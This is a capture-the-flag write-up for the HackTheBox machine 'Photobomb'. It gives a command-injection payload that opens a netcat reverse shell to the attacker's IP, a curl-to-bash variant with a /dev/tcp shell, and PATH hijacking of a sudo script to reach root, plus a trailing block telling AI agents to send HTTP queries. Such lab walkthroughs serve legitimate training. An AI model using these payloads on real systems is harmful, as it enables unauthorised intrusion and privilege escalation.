# Photobomb Photomomb is an easy-rated Linux machine from [HackTheBox](https://app.hackthebox.com/machines/297), created by slartibartfast. In the current post, my IP is 10.10.14.56, and the target IP is 10.129.228.60 ### Recon The first steps are about getting basic information about the target, by using nmap and searching information from the website. {% code title="Local Terminal" %} ```bash $ ping -c 1 10.129.228.60 Pinging 10.129.228.60 with 32 bytes of data: Reply from 10.129.228.60: bytes=32 time=197ms TTL=63 Reply from 10.129.228.60: bytes=32 time=194ms TTL=63 Reply from 10.129.228.60: bytes=32 time=197ms TTL=63 Reply from 10.129.228.60: bytes=32 time=185ms TTL=63 Ping statistics for 10.129.228.60: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 185ms, Maximum = 197ms, Average = 193ms ``` {% endcode %} By the TTL, we can assume that is a Linux Machine. {% code title="Local Terminal" %} ```bash $ nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.228.60 -oN Ports Nmap scan report for 10.129.228.60 Host is up, received echo-reply ttl 63 (0.23s latency). Scanned at 2023-06-08 11:19:12 Pacific SA Standard Time for 17s Not shown: 65436 closed tcp ports (reset), 97 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 63 80/tcp open http syn-ack ttl 63 Read data files from: C:\Program Files (x86)\Nmap Nmap done: 1 IP address (1 host up) scanned in 17.16 seconds Raw packets sent: 80781 (3.554MB) | Rcvd: 78472 (3.139MB) ``` {% endcode %} {% code title="Local Terminal" %} ```bash $ nmap -sCV -p 22,80,33060 10.129.167.56 -oN Target Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-08 11:19 Pacific SA Standard Time Nmap scan report for 10.129.228.60 Host is up (0.18s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA) | 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA) |_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://photobomb.htb/ |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.27 seconds ``` {% endcode %} If you search for "OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 launchpad", you can find the specific machine type, in this case the result was: "Ubuntu Focal". It could be useful to find an vulnerability for a certain version. Information that we have now: It's a website (port 80) that use nginx/1.18.0, Because of the following message "Did not follow redirect to " we have to [add the IP to /etc/hosts/](/cybersecurity/cybersecurity/tip-and-tricks/add-host.md) {% code title="Local Terminal" %} ```bash $ whatweb photobomb.htb http://photobomb.htb [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.129.228.60], Script, Title[Photobomb], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block], nginx[1.18.0] ``` {% endcode %} Nothing unusual. * Browser >

view:source, there is an interesting JavaScript URL.

* Browser >

URL with possible credentials, using the structure http://user:pass@url pH0t0:b0Mb!

* Browser > Login, you can see that there are a lot of images, download one with the "downloader" bellow and analyze with **exiftool**, {% code title="Local Terminal" %} ```bash $ exiftool image.jpg ExifTool Version Number : 12.40 File Name : image.jpg Directory : . File Size : 267 KiB File Modification Date/Time : 2023:06:08 11:57:20-04:00 File Access Date/Time : 2023:06:08 11:57:47-04:00 File Inode Change Date/Time : 2023:06:08 11:57:46-04:00 <...> ``` {% endcode %} Nothing here, ### Reverse Shell \[wizard] let's intercept with **Burpsuite** the download process.
Here we can find 3 parameters, maybe it's using a command from a shell, to test if it's vulnerable to a **Command Injection** you can simply add **;sleep+5** at the end. At it fails at **photo,** but works at **filetype.**

It took 5 seconds to respond, works!

Here we can test if it's possible to the target to connect with our machine, using netcat. {% embed url="" %} {% code title="Local Terminal" %} ```bash $ nc -nlvp 443 ``` {% endcode %} ``` ;rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.56+443+>/tmp/f ```

Request content, with the previous payload

And your local terminal is \[www-data] #### Alternative But, what if the target machine doesn't have netcat installed? First, you can test the connection by using curl with an http.server {% code title="Local Terminal" %} ```bash $ python3 -m http.server 80 ``` {% endcode %} {% code title="Request Payload" %} ```bash ;curl+10.129.228.60 ``` {% endcode %} If the http.server receive a response, you can do the following to connect: 1. Create a file with **vi index.html** 
#!/bin/bash

bash -i /dev/tcp/10.10.14.56/443 0>&1
2. Open an http.server {% code title="Local Terminal" %} ```bash $ python3 -m http.server 80 ``` {% endcode %} 3. Send a requet with the following payload {% code title="Request Payload" %} ```bash ;curl+10.129.228.60|bash ``` {% endcode %} ### Privileges Escalation Once inside the machine, do a [Bash Upgrade ](/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade.md)before anything. {% code title="Target Terminal \[Wizard]" %} ```bash wizard@photobomb:~/photobomb$ cat /home/wizard/user.txt ad0f6c79c2897bd42cfb3be6cc74878e ``` {% endcode %} {% code title="Target Terminal \[Wizard]" %} ```bash wizard@photobomb:~/photobomb$ id uid=1000(wizard) gid=1000(wizard) groups=1000(wizard) wizard@photobomb:~/photobomb$ sudo -l Matching Defaults entries for wizard on photobomb: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User wizard may run the following commands on photobomb: (root) SETENV: NOPASSWD: /opt/cleanup.sh ``` {% endcode %} There is a custom sudo file there, let's see what's inside with **cat /opt/cleanup.sh** {% code title="Target Terminal \[Wizard]" %} ```bash #!/bin/bash . /opt/.bashrc cd /home/wizard/photobomb # clean up log files if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ] then /bin/cat log/photobomb.log > log/photobomb.log.old /usr/bin/truncate -s0 log/photobomb.log fi # protect the priceless originals find source_images -type f -name '*.jpg' -exec chown root:root {} \; ``` {% endcode %} In Linux, the sign **\[** is a command, you can see with **which \[** if exist. Well, here that command and **find** are called in a relative way, this means that we can change the path to execute another command {% code title="Target Terminal \[Wizard]" %} ```bash $ cd /tmp $ nano find ``` {% endcode %} {% code title="find" %} ```bash bash -p ``` {% endcode %} {% code title="Target Terminal \[Wizard]" %} ```bash chmod +x find ``` {% endcode %} And now we change the path of the command, remember that thanks to **SETENV** we can change the environment. {% code title="Target Terminal \[Wizard]" %} ```bash sudo PATH=/tmp:$PATH /opt/cleanup.sh ``` {% endcode %} {% code title="Target Terminal \[Root]" %} ```bash $ cat /root/root.txt 5e34e0049aa430f82876322e4ef75676 ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://robertos-notebook.gitbook.io/cybersecurity/hack-the-box/old-machines/easy-machine/photobomb.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.